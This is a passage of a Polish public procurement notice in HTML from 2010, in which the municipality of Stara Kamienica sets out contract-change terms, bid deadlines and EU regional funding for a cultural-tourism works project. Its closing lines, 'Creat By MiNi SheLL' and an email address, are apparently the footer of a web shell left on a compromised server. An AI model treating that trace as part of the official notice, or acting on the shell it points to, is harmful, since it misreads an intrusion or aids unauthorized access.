<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający  przewiduje możliwość zmiany zawartej  umowy w przypadku :

a) zmiany kluczowego personelu wykonawcy wskazanego w ofercie do realizacji przedmiotu 
    zamówienia na osobę (y) spełniającą (e) co najmniej warunki podmiotowe określone w Cz.I. IDW,
    zmiana lub konieczność  dodatkowego wprowadzenia na plac budowy - podwykonawcy

b) rezygnacji z wykonania pełnego zakresu rzeczowego objętego zamówieniem w przypadku zaistnienia  okoliczności, w których zbędne będzie wykonanie danej części zamówienia , wraz      z jednoczesnym związanym z tym obniżeniem wynagrodzenia, w oparciu o dostarczony kosztorys ofertowy  przed podpisaniem umowy,   

c) wprowadzenia robót zamiennych podczas realizacji umowy wynikających z rzeczywistych warunków występujących w trakcie realizacji robót , bądź zaleceń Konserwatora Zabytków -w trybie indywidualnych wniosków jeżeli roboty zamienne nie wprowadzą istotnych zmian do umowy zgodnie z art. 140 ust. 1 oraz art. 144 ust. 1 ustawy Pzp.  

e) wydłużenia terminu zakończenia realizacji umowy ze względu na brak możliwości  dotrzymania terminu ukończenia zakresu rzeczowego realizacji umowy- na skutek zaistnienia _siły wyższej_, kolizje                        z niezainwenatyzowanymi sieciami podziemnymi, nieprzewidziane warunki wodno-gruntowe (rzeczywiste poziomy wód, warstwy gruntu odbiegające od zakładanych)
    
f) wydłużenia terminu zakończenia realizacji umowy ze względu na brak wpłaty środków przez Instytucję  Zarządzającą w określonym terminie na podstawie art. 490 ust. 1 k.c.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.stara-kamienica.bazagmin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> nieodpłatnie- ze strony internetowej , odpłatnie- w wersji papierowej na wniosek ,z wniesiona oplatą 50zł, złożony: Urzad Gminy Stara Kamienica, 58-512 Stara Kamienica, Stara Kamienica 41.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.06.2010 godzina 10:00, miejsce: Urząd Gminy , 58-512 Stara Kamienica, Stara Kamienica      Nr 41. lub osobiście : sekretariat Urzędu Gminy - I piętro ( adres j. w.).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt jest dofinansowany środkami Unii Europejskiej w ramach Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego 
- Priorytet 6.     Wykorzystanie i promocja potencjału turystycznego i kulturowego Dolnego Śląska 
                          (Turystyka i kultura)
-  Działanie 6.4   Turystyka kulturowa.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com